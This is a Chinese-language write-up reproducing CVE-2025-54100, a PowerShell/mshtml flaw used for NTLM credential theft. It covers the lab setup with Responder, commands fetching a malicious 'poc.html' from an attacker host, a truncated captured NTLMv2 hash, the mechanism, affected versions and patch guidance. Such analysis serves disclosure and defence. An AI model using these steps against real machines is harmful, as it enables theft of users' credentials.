CVE-2025-54100：Windows PowerShell 命令注入漏洞复现分析

CVE-2025-54100：Windows PowerShell 命令注入漏洞复现分析

一、漏洞概述

该漏洞源于 PowerShell 在处理Invoke-WebRequest请求时，默认调用 IE 的mshtml 引擎渲染 HTML/JavaScript 内容，攻击者可通过构造恶意页面触发客户端代码执行，进而窃取用户凭据或执行系统命令。

二、复现环境

• 攻击机：Kali Linux（运行 Responder 用于捕获凭据）
• 目标机：Windows 10 家庭中文版（版本 10.0.19045）
• 工具：
  • Responder 3.1.7.0
  • 简单 HTTP 服务器（托管恶意 HTML）
  • PowerShell

三、复现过程与现象

3.1 系统信息确认

通过wmic os get caption,version,buildnumber确认目标系统版本为Windows 10 19045，属于受影响版本范围。

3.2 触发漏洞请求

在 PowerShell 中执行：

Invoke-WebRequest-Uir"http://192.168.1.31/poc.html"

或使用 PowerShell 别名：

curl http://192.168.1.31/poc.html

两者均返回 HTTP 200，并触发 IE 引擎解析返回的 HTML/JavaScript 内容。

3.3 凭据窃取结果

Responder 成功捕获到NTLMv2 哈希，关键信息如下：

• Client IP: 192.168.1.30
• Username: LENOVO-LWM\Administrator
• NTLMv2 Hash:Administrator::LENOVO-LWM:051df5cf1729d59:BF64GBB0801F63CFA01BEEACF3E59AA8...

这表明漏洞成功触发并向攻击者服务器发送了当前用户的 NTLM 凭据。

四、漏洞机理分析

• Invoke-WebRequest默认使用IE 引擎渲染响应内容，而非仅进行基本解析。
• 恶意页面中嵌入的 JavaScript 可触发SMB/NTLM 认证请求，指向攻击者控制的 Responder 服务。
• 由于引擎自动执行脚本，无需用户交互即可发起认证流程，导致凭据泄露。

五、影响范围

受影响的 Windows 版本包括：

• Windows 10 1607 至 22H2（特定版本之前）
• Windows 11 23H2 至 25H2（特定版本之前）
• Windows Server 2008 ~ 2025 多个版本

具体版本号可参考 Microsoft 官方公告或漏洞详情文档。

六、修复建议

6.1 官方补丁

通过 Windows Update 安装微软官方发布的补丁，或手动下载适用于系统的安全更新：

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54100

6.2 临时缓解措施

• 避免在 PowerShell 中访问不可信的 URL。
• 可尝试修改 PowerShell 执行策略或禁用 IE 引擎调用（需测试业务兼容性）。

6.3 企业防护建议

• 使用终端防护系统（如奇安信天擎）及时更新漏洞库并推送补丁。
• 对内部 PowerShell 使用行为进行审计与监控。

七、总结

CVE-2025-54100 是一个典型的客户端代码执行漏洞，利用 PowerShell 默认行为实现凭据窃取。尽管利用门槛较低，但实际危害严重，尤其是在域环境中可能引发横向渗透。建议所有受影响系统尽快安装补丁，并加强对 PowerShell 使用场景的安全管控。

备注：我的两个Win系统都中招了😄